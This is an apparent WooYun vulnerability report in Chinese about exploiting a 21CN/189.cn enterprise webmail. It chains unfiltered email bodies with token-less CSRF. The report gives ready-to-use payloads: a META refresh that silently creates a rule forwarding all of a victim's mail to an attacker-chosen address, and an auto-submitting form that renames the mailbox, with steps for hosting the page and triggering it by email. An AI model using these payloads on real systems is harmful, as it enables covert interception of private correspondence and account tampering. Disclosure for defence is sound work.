WooYun.org

<a href="http://wooyun.org/bugs/wooyun-2014-088099">一封邮件即可控制21cn用户邮箱今后的邮件</a>是针对个人邮箱的，此处以21CN一个企业邮箱为例。
综合利用两类大小漏洞即可完成攻击
1.邮件正文过滤不严格，可插入特定攻击代码
2.敏感操作无Token导致CSRF（添加邮件转发规则GET，修改用户邮箱名字POST）
GET请求的攻击代码（创建邮件转发规则）（注意在使用burpsuit提交的时候需要将&进行url编码，否则会被截断，就无法自动创建规则了。
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://webmail30.189.cn/w2/option/addFilter.do?name=all&condition=3005&senderInclude=1001&sender=&subjectInclude=1001&subject=&sizeCompare=1007&mailSize=&action=0&setLabelId=41167481&setBoxId=1&autoForward=test%40test.com&autoReply=&id=-1 ">
test%40test.com改为被转发到的邮箱；
POST请求的攻击代码：（更改邮箱）
<form action="https://e.189.cn/iframe/modifyAlias.do" name="form" method="post">
<input type="hidden" name="modifyAlias" value="name">
<input type="hidden" name="txtCurAlias" value="ori_emailname">
<input type="hidden" name="aliasName" value="new_emailname">
</form>
<script>document.forms.form.submit();</script>
ori_emailname为原来的用户名
new_emailname为要被更改为的用户名
将上述代码保存为html页面，并添加到攻击代码中，构成如下页面：
http://xxx.xxx.com/1.html
然后将下面的代码插入到邮件正文中，当用户点击时即可触发
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://xxx.xxx.com/1.html">